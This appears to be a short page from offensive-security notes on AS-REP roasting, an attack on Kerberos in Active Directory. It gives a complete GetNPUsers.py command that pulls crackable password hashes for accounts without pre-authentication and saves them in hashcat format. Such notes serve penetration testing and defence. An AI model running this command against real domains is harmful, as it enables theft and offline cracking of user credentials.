AS-REP Roasting

AS-REP roasting is an offensive technique against Kerberos that allows password hashes to be retrieved for users that do not require pre-authentication. If the user has “Do not use Kerberos pre-authentication” enabled, then an attacker can recover a Kerberos AS-REP encrypted with the users RC4-HMAC’d password and he can attempt to crack this ticket offline. https://www.hackingarticles.in/as-rep-roasting/

python3 GetNPUsers.py -request -dc-ip 10.0.0.1 acme.corp/ -usersfile users.txt -format hashcat -outputfile out.hashcat -no-pass

10.0.0.1 = The IP of the domain controller
acme.corp = The domain (you will run into issues on this step, it is local for the formal name of the domain, so I can’t just use ACME for example)

PreviousKerberoasting NextDumping NTDS

Last updated 1 year ago